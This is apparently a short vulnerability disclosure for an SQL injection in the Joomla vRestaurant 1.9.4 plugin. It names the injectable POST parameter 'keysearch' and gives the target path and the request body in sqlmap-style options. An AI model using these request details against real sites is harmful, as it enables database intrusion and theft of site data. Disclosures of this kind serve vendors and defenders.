################################################ #Title: Joomla! vRestaurant 1.9.4 - SQL injection #Credit: Bilal KARDADOU #Vendor: https://www.wdmtech.com #URL: https://extensions.joomla.org/extensions/extension/vertical-markets/food-a-beverage/vrestaurant/ #Product: 'Joomla! vRestaurant 1.9.4' #Developer: WDMtech #Extension type: Plugin #Last updated: Jul 11 2017 #Compatibility: 3.X #Type: Paid download #Google Dork: N/A ################################################ # # Description: # vRestaurant is a Joomla component which adds amazing features to your Website for restaurant or help you creating an online restaurant search and discovery service providing portal. # # # --Method=POST -p [keysearch] # # -u "http://127.0.0.1/menu-listing-layout/menuitems" # # --data="csmodid=236&Itemid=303&keysearch=a[SQLI]&categories%5B%5D=2&categories%5B%5D=3&categories%5B%5D=4&categories%5B%5D=5&categories%5B%5D=6&categories%5B%5D=7&veg_nonveg=veg&min=10&max=100&Itemid=323" # # PoC: # https://prnt.sc/hwfaya # # # Bilal KARDADOU - https://www.linkedin.com/in/kardadou/) ################################################